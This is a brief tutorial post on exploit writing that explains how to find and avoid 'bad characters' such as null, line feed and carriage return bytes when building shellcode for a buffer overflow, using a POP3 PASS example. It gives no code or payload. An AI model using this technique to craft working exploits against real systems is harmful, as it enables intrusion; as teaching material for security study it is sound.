Writing Shellcode for Buffer Overflows – Avoiding Bad Characters

Acronis Cyber Protect

Depending on the application, vulnerability type, and protocols in use, there may be certain characters that are considered “bad” and should not be used in your buffer, return address, or shellcode. One example of a common bad character (especially in buffer overflows caused by unchecked string copy operations) is the null byte (0x00). This character is considered bad because a null byte is also used to terminate a string copy operation, which would effectively truncate our buffer to wherever the first null byte appears. Another example of a bad character, specific to the POP3 PASS command, is the carriage return (0x0D), which signifies to the application that the end of the password has been reached.

An experienced exploit writer knows to check for bad characters,to prevent future problems. An easy way to do this is to send all possible characters, from 0x00 to 0xff, as part of our buffer, and see how these characters are dealt with by the application, after the crash occurs.

If you review the resulting memory dump from your fuzzing and check the ESP register and see the character 0x0A you’ll notice it truncated the rest of the buffer that comes after it.

Once you identify that the 0x0A character is a Line Feed, which is a bad character, in this case, for the same reasons that a Carriage Return is bad. We remove the \x0A character from our list, and resend the payload.
To summarize, our buffer should not include in any way the following characters: 0x00, 0x0A, 0x0D.

Leave a Comment